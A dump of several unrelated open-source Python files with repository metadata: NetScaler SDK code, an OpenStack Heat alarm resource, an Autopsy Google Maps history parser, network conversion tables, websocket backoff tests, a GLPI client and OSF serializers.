obj[i] = appfwlearningsettings()
obj[i].profilename = name[i]
response[i] = obj[i].get_resource(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_filtered(cls, client, filter_) :
ur""" Use this API to fetch filtered set of appfwlearningsettings resources.
filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = appfwlearningsettings()
option_ = options()
option_.filter = filter_
response = obj.getfiltered(client, option_)
return response
except Exception as e :
raise e
@classmethod
def count(cls, client) :
ur""" Use this API to count the appfwlearningsettings resources configured on NetScaler.
"""
try :
obj = appfwlearningsettings()
option_ = options()
option_.count = True
response = obj.get_resources(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
@classmethod
def count_filtered(cls, client, filter_) :
ur""" Use this API to count filtered the set of appfwlearningsettings resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = appfwlearningsettings()
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
class appfwlearningsettings_response(base_response) :
def __init__(self, length=1) :
self.appfwlearningsettings = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.appfwlearningsettings = [appfwlearningsettings() for _ in range(length)]
|
benfinke/ns_python
|
nssrc/com/citrix/netscaler/nitro/resource/config/appfw/appfwlearningsettings.py
|
Python
|
apache-2.0
| 24,257
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from heat.common import exception
from heat.common.i18n import _
from heat.engine import constraints
from heat.engine import properties
from heat.engine import resource
from heat.engine import support
from heat.engine import watchrule
COMMON_PROPERTIES = (
ALARM_ACTIONS, OK_ACTIONS, REPEAT_ACTIONS, INSUFFICIENT_DATA_ACTIONS,
DESCRIPTION, ENABLED,
) = (
'alarm_actions', 'ok_actions', 'repeat_actions',
'insufficient_data_actions', 'description', 'enabled',
)
common_properties_schema = {
DESCRIPTION: properties.Schema(
properties.Schema.STRING,
_('Description for the alarm.'),
update_allowed=True
),
ENABLED: properties.Schema(
properties.Schema.BOOLEAN,
_('True if alarm evaluation/actioning is enabled.'),
default='true',
update_allowed=True
),
ALARM_ACTIONS: properties.Schema(
properties.Schema.LIST,
_('A list of URLs (webhooks) to invoke when state transitions to '
'alarm.'),
update_allowed=True
),
OK_ACTIONS: properties.Schema(
properties.Schema.LIST,
_('A list of URLs (webhooks) to invoke when state transitions to '
'ok.'),
update_allowed=True
),
INSUFFICIENT_DATA_ACTIONS: properties.Schema(
properties.Schema.LIST,
_('A list of URLs (webhooks) to invoke when state transitions to '
'insufficient-data.'),
update_allowed=True
),
REPEAT_ACTIONS: properties.Schema(
properties.Schema.BOOLEAN,
_("False to trigger actions when the threshold is reached AND "
"the alarm's state has changed. By default, actions are called "
"each time the threshold is reached."),
default='true',
update_allowed=True
)
}
NOVA_METERS = ['instance', 'memory', 'memory.usage',
'cpu', 'cpu_util', 'vcpus',
'disk.read.requests', 'disk.read.requests.rate',
'disk.write.requests', 'disk.write.requests.rate',
'disk.read.bytes', 'disk.read.bytes.rate',
'disk.write.bytes', 'disk.write.bytes.rate',
'disk.device.read.requests', 'disk.device.read.requests.rate',
'disk.device.write.requests', 'disk.device.write.requests.rate',
'disk.device.read.bytes', 'disk.device.read.bytes.rate',
'disk.device.write.bytes', 'disk.device.write.bytes.rate',
'disk.root.size', 'disk.ephemeral.size',
'network.incoming.bytes', 'network.incoming.bytes.rate',
'network.outgoing.bytes', 'network.outgoing.bytes.rate',
'network.incoming.packets', 'network.incoming.packets.rate',
'network.outgoing.packets', 'network.outgoing.packets.rate']
def actions_to_urls(stack, properties):
kwargs = {}
for k, v in iter(properties.items()):
if k in [ALARM_ACTIONS, OK_ACTIONS,
INSUFFICIENT_DATA_ACTIONS] and v is not None:
kwargs[k] = []
for act in v:
# if the action is a resource name
# we ask the destination resource for an alarm url.
# the template writer should really do this in the
# template if possible with:
# {Fn::GetAtt: ['MyAction', 'AlarmUrl']}
if act in stack:
url = stack[act].FnGetAtt('AlarmUrl')
kwargs[k].append(url)
else:
if act:
kwargs[k].append(act)
else:
kwargs[k] = v
return kwargs
class CeilometerAlarm(resource.Resource):
PROPERTIES = (
COMPARISON_OPERATOR, EVALUATION_PERIODS, METER_NAME, PERIOD,
STATISTIC, THRESHOLD, MATCHING_METADATA, QUERY,
) = (
'comparison_operator', 'evaluation_periods', 'meter_name', 'period',
'statistic', 'threshold', 'matching_metadata', 'query',
)
QUERY_FACTOR_FIELDS = (
QF_FIELD, QF_OP, QF_VALUE,
) = (
'field', 'op', 'value',
)
QF_OP_VALS = constraints.AllowedValues(['le', 'ge', 'eq',
'lt', 'gt', 'ne'])
properties_schema = {
COMPARISON_OPERATOR: properties.Schema(
properties.Schema.STRING,
_('Operator used to compare specified statistic with threshold.'),
constraints=[
constraints.AllowedValues(['ge', 'gt', 'eq', 'ne', 'lt',
'le']),
],
update_allowed=True
),
EVALUATION_PERIODS: properties.Schema(
properties.Schema.INTEGER,
_('Number of periods to evaluate over.'),
update_allowed=True
),
METER_NAME: properties.Schema(
properties.Schema.STRING,
_('Meter name watched by the alarm.'),
required=True
),
PERIOD: properties.Schema(
properties.Schema.INTEGER,
_('Period (seconds) to evaluate over.'),
update_allowed=True
),
STATISTIC: properties.Schema(
properties.Schema.STRING,
_('Meter statistic to evaluate.'),
constraints=[
constraints.AllowedValues(['count', 'avg', 'sum', 'min',
'max']),
],
update_allowed=True
),
THRESHOLD: properties.Schema(
properties.Schema.NUMBER,
_('Threshold to evaluate against.'),
required=True,
update_allowed=True
),
MATCHING_METADATA: properties.Schema(
properties.Schema.MAP,
_('Meter should match this resource metadata (key=value) '
'additionally to the meter_name.'),
default={},
update_allowed=True
),
QUERY: properties.Schema(
properties.Schema.LIST,
_('A list of query factors, each comparing '
'a Sample attribute with a value. '
'Implicitly combined with matching_metadata, if any.'),
update_allowed=True,
support_status=support.SupportStatus(version='2015.1'),
schema=properties.Schema(
properties.Schema.MAP,
schema={
QF_FIELD: properties.Schema(
properties.Schema.STRING,
_('Name of attribute to compare. '
'Names of the form metadata.user_metadata.X '
'or metadata.metering.X are equivalent to what '
'you can address through matching_metadata; '
'the former for Nova meters, '
'the latter for all others. '
'To see the attributes of your Samples, '
'use `ceilometer --debug sample-list`.')
),
QF_OP: properties.Schema(
properties.Schema.STRING,
_('Comparison operator'),
constraints=[QF_OP_VALS]
),
QF_VALUE: properties.Schema(
properties.Schema.STRING,
_('String value with which to compare')
)
}
)
)
}
properties_schema.update(common_properties_schema)
default_client_name = 'ceilometer'
def cfn_to_ceilometer(self, stack, properties):
"""Apply all relevant compatibility xforms."""
kwargs = actions_to_urls(stack, properties)
kwargs['type'] = 'threshold'
if kwargs.get(self.METER_NAME) in NOVA_METERS:
prefix = 'user_metadata.'
else:
prefix = 'metering.'
rule = {}
for field in ['period', 'evaluation_periods', 'threshold',
'statistic', 'comparison_operator', 'meter_name']:
if field in kwargs:
rule[field] = kwargs[field]
del kwargs[field]
mmd = properties.get(self.MATCHING_METADATA) or {}
query = properties.get(self.QUERY) or []
# make sure the matching_metadata appears in the query like this:
# {field: metadata.$prefix.x, ...}
for m_k, m_v in six.iteritems(mmd):
if m_k.startswith('metadata.%s' % prefix):
key = m_k
elif m_k.startswith(prefix):
key = 'metadata.%s' % m_k
else:
key = 'metadata.%s%s' % (prefix, m_k)
# NOTE(prazumovsky): type of query value must be a string, but
# matching_metadata value type can not be a string, so we
# must convert value to a string type.
query.append(dict(field=key, op='eq', value=six.text_type(m_v)))
if self.MATCHING_METADATA in kwargs:
del kwargs[self.MATCHING_METADATA]
if self.QUERY in kwargs:
del kwargs[self.QUERY]
if query:
rule['query'] = query
kwargs['threshold_rule'] = rule
return kwargs
def handle_create(self):
props = self.cfn_to_ceilometer(self.stack,
self.properties)
props['name'] = self.physical_resource_name()
alarm = self.ceilometer().alarms.create(**props)
self.resource_id_set(alarm.alarm_id)
# the watchrule below is for backwards compatibility.
# 1) so we don't create watch tasks unneccessarly
# 2) to support CW stats post, we will redirect the request
# to ceilometer.
wr = watchrule.WatchRule(context=self.context,
watch_name=self.physical_resource_name(),
rule=self.parsed_template('Properties'),
stack_id=self.stack.id)
wr.state = wr.CEILOMETER_CONTROLLED
wr.store()
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
if prop_diff:
kwargs = {'alarm_id': self.resource_id}
kwargs.update(self.properties)
kwargs.update(prop_diff)
alarms_client = self.ceilometer().alarms
alarms_client.update(**self.cfn_to_ceilometer(self.stack, kwargs))
def handle_suspend(self):
if self.resource_id is not None:
self.ceilometer().alarms.update(alarm_id=self.resource_id,
enabled=False)
def handle_resume(self):
if self.resource_id is not None:
self.ceilometer().alarms.update(alarm_id=self.resource_id,
enabled=True)
def handle_delete(self):
try:
wr = watchrule.WatchRule.load(
self.context, watch_name=self.physical_resource_name())
wr.destroy()
except exception.WatchRuleNotFound:
pass
if self.resource_id is not None:
try:
self.ceilometer().alarms.delete(self.resource_id)
except Exception as ex:
self.client_plugin().ignore_not_found(ex)
def handle_check(self):
watch_name = self.physical_resource_name()
watchrule.WatchRule.load(self.context, watch_name=watch_name)
self.ceilometer().alarms.get(self.resource_id)
class BaseCeilometerAlarm(resource.Resource):
default_client_name = 'ceilometer'
def handle_create(self):
properties = actions_to_urls(self.stack,
self.properties)
properties['name'] = self.physical_resource_name()
properties['type'] = self.ceilometer_alarm_type
alarm = self.ceilometer().alarms.create(
**self._reformat_properties(properties))
self.resource_id_set(alarm.alarm_id)
def _reformat_properties(self, properties):
rule = {}
for name in self.PROPERTIES:
value = properties.pop(name, None)
if value:
rule[name] = value
if rule:
properties['%s_rule' % self.ceilometer_alarm_type] = rule
return properties
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
if prop_diff:
kwargs = {'alarm_id': self.resource_id}
kwargs.update(prop_diff)
alarms_client = self.ceilometer().alarms
alarms_client.update(**self._reformat_properties(
actions_to_urls(self.stack, kwargs)))
def handle_suspend(self):
self.ceilometer().alarms.update(
alarm_id=self.resource_id, enabled=False)
def handle_resume(self):
self.ceilometer().alarms.update(
alarm_id=self.resource_id, enabled=True)
def handle_delete(self):
try:
self.ceilometer().alarms.delete(self.resource_id)
except Exception as ex:
self.client_plugin().ignore_not_found(ex)
def handle_check(self):
self.ceilometer().alarms.get(self.resource_id)
class CombinationAlarm(BaseCeilometerAlarm):
support_status = support.SupportStatus(version='2014.1')
PROPERTIES = (
ALARM_IDS, OPERATOR,
) = (
'alarm_ids', 'operator',
)
properties_schema = {
ALARM_IDS: properties.Schema(
properties.Schema.LIST,
_('List of alarm identifiers to combine.'),
required=True,
constraints=[constraints.Length(min=1)],
update_allowed=True),
OPERATOR: properties.Schema(
properties.Schema.STRING,
_('Operator used to combine the alarms.'),
constraints=[constraints.AllowedValues(['and', 'or'])],
update_allowed=True)
}
properties_schema.update(common_properties_schema)
ceilometer_alarm_type = 'combination'
def resource_mapping():
return {
'OS::Ceilometer::Alarm': CeilometerAlarm,
'OS::Ceilometer::CombinationAlarm': CombinationAlarm,
}
|
pshchelo/heat
|
heat/engine/resources/openstack/ceilometer/alarm.py
|
Python
|
apache-2.0
| 14,721
|
"""
Autopsy Forensic Browser
Copyright 2016-2018 Basis Technology Corp.
Contact: carrier <at> sleuthkit <dot> org
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from java.io import File
from java.lang import Class
from java.lang import ClassNotFoundException
from java.lang import Double
from java.lang import Long
from java.sql import Connection
from java.sql import DriverManager
from java.sql import ResultSet
from java.sql import SQLException
from java.sql import Statement
from java.util.logging import Level
from java.util import ArrayList
from org.sleuthkit.autopsy.casemodule import Case
from org.sleuthkit.autopsy.casemodule.services import FileManager
from org.sleuthkit.autopsy.coreutils import Logger
from org.sleuthkit.autopsy.coreutils import MessageNotifyUtil
from org.sleuthkit.autopsy.datamodel import ContentUtils
from org.sleuthkit.autopsy.ingest import IngestJobContext
from org.sleuthkit.datamodel import AbstractFile
from org.sleuthkit.datamodel import Blackboard
from org.sleuthkit.datamodel import BlackboardArtifact
from org.sleuthkit.datamodel import BlackboardAttribute
from org.sleuthkit.datamodel import Content
from org.sleuthkit.datamodel import TskCoreException
from org.sleuthkit.datamodel.Blackboard import BlackboardException
from org.sleuthkit.datamodel.blackboardutils import GeoArtifactsHelper
from org.sleuthkit.datamodel.blackboardutils.attributes import GeoWaypoints
from org.sleuthkit.datamodel.blackboardutils.attributes.GeoWaypoints import Waypoint
import traceback
import general
"""
Finds and parses the Google Maps database.
"""
class GoogleMapLocationAnalyzer(general.AndroidComponentAnalyzer):
def __init__(self):
self._logger = Logger.getLogger(self.__class__.__name__)
self.current_case = None
self.PROGRAM_NAME = "Google Maps History"
self.CAT_DESTINATION = "Destination"
def analyze(self, dataSource, fileManager, context):
try:
self.current_case = Case.getCurrentCaseThrows()
except NoCurrentCaseException as ex:
self._logger.log(Level.WARNING, "No case currently open.", ex)
self._logger.log(Level.WARNING, traceback.format_exc())
return
try:
absFiles = fileManager.findFiles(dataSource, "da_destination_history")
if absFiles.isEmpty():
return
for abstractFile in absFiles:
try:
jFile = File(self.current_case.getTempDirectory(), str(abstractFile.getId()) + abstractFile.getName())
ContentUtils.writeToFile(abstractFile, jFile, context.dataSourceIngestIsCancelled)
self.__findGeoLocationsInDB(jFile.toString(), abstractFile)
except Exception as ex:
self._logger.log(Level.SEVERE, "Error parsing Google map locations", ex)
self._logger.log(Level.SEVERE, traceback.format_exc())
except TskCoreException as ex:
# Error finding Google map locations.
pass
def __findGeoLocationsInDB(self, databasePath, abstractFile):
if not databasePath:
return
try:
artifactHelper = GeoArtifactsHelper(self.current_case.getSleuthkitCase(),
general.MODULE_NAME, self.PROGRAM_NAME, abstractFile)
Class.forName("org.sqlite.JDBC") # load JDBC driver
connection = DriverManager.getConnection("jdbc:sqlite:" + databasePath)
statement = connection.createStatement()
except (ClassNotFoundException) as ex:
self._logger.log(Level.SEVERE, "Error loading JDBC driver", ex)
self._logger.log(Level.SEVERE, traceback.format_exc())
return
except (SQLException) as ex:
# Error opening database.
return
resultSet = None
try:
resultSet = statement.executeQuery(
"SELECT time, dest_lat, dest_lng, dest_title, dest_address, source_lat, source_lng FROM destination_history;")
while resultSet.next():
time = Long.valueOf(resultSet.getString("time")) / 1000
dest_title = resultSet.getString("dest_title")
dest_address = resultSet.getString("dest_address")
dest_lat = GoogleMapLocationAnalyzer.convertGeo(resultSet.getString("dest_lat"))
dest_lng = GoogleMapLocationAnalyzer.convertGeo(resultSet.getString("dest_lng"))
source_lat = GoogleMapLocationAnalyzer.convertGeo(resultSet.getString("source_lat"))
source_lng = GoogleMapLocationAnalyzer.convertGeo(resultSet.getString("source_lng"))
waypointlist = GeoWaypoints()
waypointlist.addPoint(Waypoint(source_lat, source_lng, None, None))
waypointlist.addPoint(Waypoint(dest_lat, dest_lng, None, dest_address))
artifactHelper.addRoute(dest_title, time, waypointlist, None)
except SQLException as ex:
# Unable to execute Google map locations SQL query against database.
pass
except TskCoreException as ex:
self._logger.log(Level.SEVERE, "Failed to add route artifacts.", ex)
self._logger.log(Level.SEVERE, traceback.format_exc())
except BlackboardException as ex:
self._logger.log(Level.WARNING, "Failed to post artifacts.", ex)
self._logger.log(Level.WARNING, traceback.format_exc())
except Exception as ex:
self._logger.log(Level.SEVERE, "Error processing google maps history.", ex)
self._logger.log(Level.SEVERE, traceback.format_exc())
finally:
try:
if resultSet is not None:
resultSet.close()
statement.close()
connection.close()
except Exception as ex:
# Error closing the database.
pass
# add periods 6 decimal places before the end.
@staticmethod
def convertGeo(s):
length = len(s)
if length > 6:
return Double.valueOf(s[0 : length-6] + "." + s[length-6 : length])
else:
return Double.valueOf(s)
|
wschaeferB/autopsy
|
InternalPythonModules/android/googlemaplocation.py
|
Python
|
apache-2.0
| 6,752
|
# -*- coding:utf-8 -*-
# Copyright 2015 NEC Corporation. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
class ConversionTable(object):
def __init__(self):
self.__connection_type_map = {}
self.__network_conversion_table = {}
self.__node_conversion_table = {}
self.__port_conversion_table = {}
self.__link_conversion_table = {}
self.__flow_conversion_table = {}
def get_connection_type(self, connection_id):
if connection_id in self.__connection_type_map:
return self.__connection_type_map[connection_id]
return None
def get_connection_list(self, connection_type):
connection_ids = []
for k_conn_id, v_conn_type in self.__connection_type_map.items():
if connection_type == v_conn_type:
connection_ids.append(k_conn_id)
return connection_ids
def is_connection_type(self, connection_type):
if connection_type is None or\
len(self.get_connection_list(connection_type)) == 0:
return False
return True
def add_entry_connection_type(self, connection_id, connection_type):
self.__connection_type_map[connection_id] = connection_type
def del_entry_connection_type(self, connection_id):
if self.__connection_type_map.has_key(connection_id):
del self.__connection_type_map[connection_id]
def get_network(self, network_id):
networks = []
if network_id in self.__network_conversion_table:
networks = self.__network_conversion_table[network_id]
return networks
def get_node(self, network_id, node_id):
nodes = []
key = network_id + "::" + node_id
if key in self.__node_conversion_table:
nodes = self.__node_conversion_table[key]
return nodes
def get_port(self, network_id, node_id, port_id):
ports = []
key = network_id + "::" + node_id + "::" + port_id
if key in self.__port_conversion_table:
ports = self.__port_conversion_table[key]
return ports
def get_link(self, network_id, link_id):
links = []
key = network_id + "::" + link_id
if key in self.__link_conversion_table:
links = self.__link_conversion_table[key]
return links
def get_flow(self, network_id, flow_id):
flows = []
key = network_id + "::" + flow_id
if key in self.__flow_conversion_table:
flows = self.__flow_conversion_table[key]
return flows
def add_entry_network(self, nwc_id_1, nwc_id_2):
self.__add_entry_object(self.__network_conversion_table,
nwc_id_1,
nwc_id_2)
def add_entry_node(self, org_nwc_id, org_node_id,
rep_nwc_id, rep_node_id):
key = org_nwc_id + "::" + org_node_id
value = rep_nwc_id + "::" + rep_node_id
self.__add_entry_object(self.__node_conversion_table,
key,
value)
def add_entry_port(self, org_nwc_id, org_node_id, org_port_id,
rep_nwc_id, rep_node_id, rep_port_id):
key = org_nwc_id + "::" + org_node_id + "::" + org_port_id
value = rep_nwc_id + "::" + rep_node_id + "::" + rep_port_id
self.__add_entry_object(self.__port_conversion_table,
key,
value)
def add_entry_link(self, org_nwc_id, org_link_id,
rep_nwc_id, rep_link_id):
key = org_nwc_id + "::" + org_link_id
value = rep_nwc_id + "::" + rep_link_id
self.__add_entry_object(self.__link_conversion_table,
key,
value)
def add_entry_flow(self, org_nwc_id, org_flow_id,
rep_nwc_id, rep_flow_id):
key = org_nwc_id + "::" + org_flow_id
value = rep_nwc_id + "::" + rep_flow_id
self.__add_entry_object(self.__flow_conversion_table,
key,
value)
def __add_entry_object(self, conv_table_obj, key, value):
# key setting
if key not in conv_table_obj:
conv_table_obj[key] = []
conv_table_obj[key].append(value)
# value -> key setting(reverse setting)
if value not in conv_table_obj:
conv_table_obj[value] = []
conv_table_obj[value].append(key)
def del_entry_network(self, key):
self.__del_entry_object(self.__network_conversion_table, key)
def del_entry_node(self, network_id, node_id):
# delete Port => Node.
del_port_list = []
for port_id in self.__port_conversion_table:
port_list = port_id.split("::")
if port_list[0] == network_id and\
port_list[1] == node_id:
del_port_list.append(port_id)
for port_id in del_port_list:
self.__del_entry_object(self.__port_conversion_table,
port_id)
key = network_id + "::" + node_id
self.__del_entry_object(self.__node_conversion_table, key)
def del_entry_port(self, network_id, node_id, port_id):
key = network_id + "::" + node_id + "::" + port_id
self.__del_entry_object(self.__port_conversion_table, key)
def del_entry_link(self, network_id, link_id):
key = network_id + "::" + link_id
self.__del_entry_object(self.__link_conversion_table, key)
def del_entry_flow(self, network_id, flow_id):
key = network_id + "::" + flow_id
self.__del_entry_object(self.__flow_conversion_table, key)
def __del_entry_object(self, conv_table_obj, key):
if key not in conv_table_obj:
return
# value -> key remove(reverse setting remove)
reverse_keys = conv_table_obj[key]
for reverse_key in reverse_keys:
if reverse_key not in conv_table_obj:
continue
if len(conv_table_obj[reverse_key]) > 1:
conv_table_obj[reverse_key].remove(key)
continue
del conv_table_obj[reverse_key]
del conv_table_obj[key]
|
nis-sdn/odenos
|
src/main/python/org/o3project/odenos/core/component/conversion_table.py
|
Python
|
apache-2.0
| 7,233
|
# Copyright 2015 Mirantis, Inc.
# Copyright 2012-2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import setuptools
setuptools.setup(
setup_requires=['pbr'],
pbr=True)
|
Mirantis/vmware-firewall-driver
|
setup.py
|
Python
|
apache-2.0
| 738
|
#
# Copyright (C) 2014 Dell, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime
import math
import mock
import time
import unittest
import dcm.agent.connection.websocket as websocket
import dcm.agent.handshake as handshake
import dcm.agent.tests.utils.general as test_utils
from dcm.agent.events.globals import global_space as dcm_events
def fake_incoming_message(incoming_doc):
pass
class TestBackoff(unittest.TestCase):
@classmethod
def setUpClass(cls):
test_utils.connect_to_debugger()
def run_with_connect_errors(
self,
backoff_seconds,
max_backoff_seconds,
run_time_seconds,
conn_obj):
class FakeHS(object):
def get_send_document(self):
ws.throw_error(Exception("just for tests"))
return {}
def incoming_document(self, incoming_doc):
return handshake.HandshakeIncomingReply(
handshake.HandshakeIncomingReply.REPLY_CODE_SUCCESS)
m = mock.Mock()
conn_obj.return_value = m
server_url = "wss://notreal.com"
ws = websocket.WebSocketConnection(
server_url,
backoff_amount=int(backoff_seconds*1000),
max_backoff=int(max_backoff_seconds*1000))
ws.connect(fake_incoming_message, FakeHS())
nw = datetime.datetime.now()
done_time = nw + datetime.timedelta(seconds=run_time_seconds)
while done_time > nw:
remaining = done_time - nw
dcm_events.poll(timeblock=remaining.total_seconds())
nw = datetime.datetime.now()
ws.close()
return m
@mock.patch('dcm.agent.connection.websocket._WebSocketClient')
def test_no_retry(self, conn_obj):
"""Make sure that just 1 connect happens when waiting less than the
backoff time"""
m = mock.Mock()
conn_obj.return_value = m
backoff_seconds = 3.0
max_backoff_seconds = backoff_seconds * 100.0 # just make a big number
run_time_seconds = backoff_seconds / 2.0 # less then the back off
m = self.run_with_connect_errors(
backoff_seconds,
max_backoff_seconds,
run_time_seconds,
conn_obj)
self.assertEqual(1, m.connect.call_count)
@mock.patch('dcm.agent.connection.websocket._WebSocketClient')
def test_retry_connections(self, conn_obj):
"""Make sure reconnections happen"""
m = mock.Mock()
conn_obj.return_value = m
initial_backoff_seconds = 0.5
max_backoff_seconds = 600.0
run_time_seconds = 5.0
expected_backoff_count =\
int(math.log(run_time_seconds / initial_backoff_seconds, 2))
m = self.run_with_connect_errors(
initial_backoff_seconds,
max_backoff_seconds,
run_time_seconds,
conn_obj)
self.assertLessEqual(expected_backoff_count-2, m.connect.call_count)
self.assertGreaterEqual(expected_backoff_count+2, m.connect.call_count)
@mock.patch('dcm.agent.connection.websocket._WebSocketClient')
def test_retry_connections_never_more_than_max_back(self, conn_obj):
m = mock.Mock()
conn_obj.return_value = m
initial_backoff_seconds = 5.0
max_backoff_seconds = 0.1
run_time_seconds = 3.0
expected_backoff_count = run_time_seconds / max_backoff_seconds
m = self.run_with_connect_errors(
initial_backoff_seconds,
max_backoff_seconds,
run_time_seconds,
conn_obj)
self.assertGreaterEqual(expected_backoff_count, m.connect.call_count)
@mock.patch('dcm.agent.connection.websocket._WebSocketClient')
def test_force_backoff(self, conn_obj):
# force the backoff to be longer than the max run time then make sure
# that the connect is only called once
backoff_seconds = 0.2
max_backoff_seconds = backoff_seconds
run_time_seconds = backoff_seconds * 10.0
force_time = run_time_seconds + 1.0
m = mock.Mock()
conn_obj.return_value = m
server_url = "wss://notreal.com"
ws = websocket.WebSocketConnection(
server_url,
backoff_amount=int(backoff_seconds*1000),
max_backoff=int(max_backoff_seconds*1000))
def send_in_handshake():
ws.event_incoming_message(
{handshake.HandshakeIncomingReply.REPLY_KEY_FORCE_BACKOFF:
force_time,
'return_code':
handshake.HandshakeIncomingReply.REPLY_CODE_FORCE_BACKOFF})
class FakeHS(object):
def get_send_document(self):
dcm_events.register_callback(send_in_handshake)
return {}
def incoming_document(self, incoming_doc):
hs = handshake.HandshakeIncomingReply(
handshake.HandshakeIncomingReply.REPLY_CODE_FORCE_BACKOFF,
force_backoff=force_time)
return hs
ws.connect(fake_incoming_message, FakeHS())
nw = datetime.datetime.now()
done_time = nw + datetime.timedelta(seconds=run_time_seconds)
while done_time > nw:
remaining = done_time - nw
dcm_events.poll(timeblock=remaining.total_seconds())
nw = datetime.datetime.now()
ws.close()
self.assertEqual(1, m.connect.call_count)
def test_backoff_object_ready_immediately(self):
initial_backoff_second = 300.0
max_backoff_seconds = initial_backoff_second
backoff = websocket.Backoff(
max_backoff_seconds,
initial_backoff_second=initial_backoff_second)
self.assertTrue(backoff.ready())
def test_backoff_object_error_not_ready(self):
initial_backoff_second = 300.0
max_backoff_seconds = initial_backoff_second
backoff = websocket.Backoff(
max_backoff_seconds,
initial_backoff_second=initial_backoff_second)
backoff.error()
self.assertFalse(backoff.ready())
def test_backoff_object_error_wait_ready(self):
initial_backoff_second = 0.05
max_backoff_seconds = initial_backoff_second
backoff = websocket.Backoff(
max_backoff_seconds,
initial_backoff_second=initial_backoff_second)
backoff.error()
time.sleep(initial_backoff_second)
self.assertTrue(backoff.ready())
def test_backoff_object_ready_after_many_errors_than_activity(self):
initial_backoff_second = 0.05
max_backoff_seconds = initial_backoff_second
backoff = websocket.Backoff(
max_backoff_seconds,
initial_backoff_second=initial_backoff_second)
backoff.error()
backoff.error()
backoff.error()
backoff.error()
backoff.error()
backoff.error()
self.assertFalse(backoff.ready())
backoff.activity()
self.assertTrue(backoff.ready())
|
JPWKU/unix-agent
|
src/dcm/agent/tests/unit/test_backoff.py
|
Python
|
apache-2.0
| 7,619
|
# Copyright 2017 Predict & Truly Systems All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .glpi import GlpiService
from .glpi_item import GlpiItem
class KnowBase(GlpiItem):
""" Object of KB """
def __init__(self, attributes={}):
""" Construct an KB Item. """
GlpiItem.__init__(self, {})
defaults = {
"knowbaseitemcategories_id": 0,
"users_id": 2,
"is_faq": 0,
"view": 1
}
self.set_attributes(attributes=attributes)
self.set_attributes(attributes=defaults)
class GlpiKnowBase(GlpiService):
""" Client for GLPI Knowledge Base item """
def __init__(self, url, app_token, username,
password):
""" Construct an instance for Ticket item """
uri = '/Knowbaseitem'
GlpiService.__init__(self, url, app_token, uri,
username=username, password=password)
|
truly-systems/glpi-sdk-python
|
glpi/item_knowbase.py
|
Python
|
apache-2.0
| 1,459
|
from rest_framework import serializers as ser
from api.base.serializers import ShowIfVersion
from api.providers.serializers import PreprintProviderSerializer
class DeprecatedPreprintProviderSerializer(PreprintProviderSerializer):
class Meta:
type_ = 'preprint_providers'
# Deprecated fields
header_text = ShowIfVersion(
ser.CharField(read_only=True, default=''),
min_version='2.0', max_version='2.3'
)
banner_path = ShowIfVersion(
ser.CharField(read_only=True, default=''),
min_version='2.0', max_version='2.3'
)
logo_path = ShowIfVersion(
ser.CharField(read_only=True, default=''),
min_version='2.0', max_version='2.3'
)
email_contact = ShowIfVersion(
ser.CharField(read_only=True, allow_null=True),
min_version='2.0', max_version='2.3'
)
social_twitter = ShowIfVersion(
ser.CharField(read_only=True, allow_null=True),
min_version='2.0', max_version='2.3'
)
social_facebook = ShowIfVersion(
ser.CharField(read_only=True, allow_null=True),
min_version='2.0', max_version='2.3'
)
social_instagram = ShowIfVersion(
ser.CharField(read_only=True, allow_null=True),
min_version='2.0', max_version='2.3'
)
subjects_acceptable = ShowIfVersion(
ser.ListField(read_only=True, default=[]),
min_version='2.0', max_version='2.4'
)
|
icereval/osf.io
|
api/preprint_providers/serializers.py
|
Python
|
apache-2.0
| 1,430
|
# Copyright 2014 Mirantis, Inc.
#
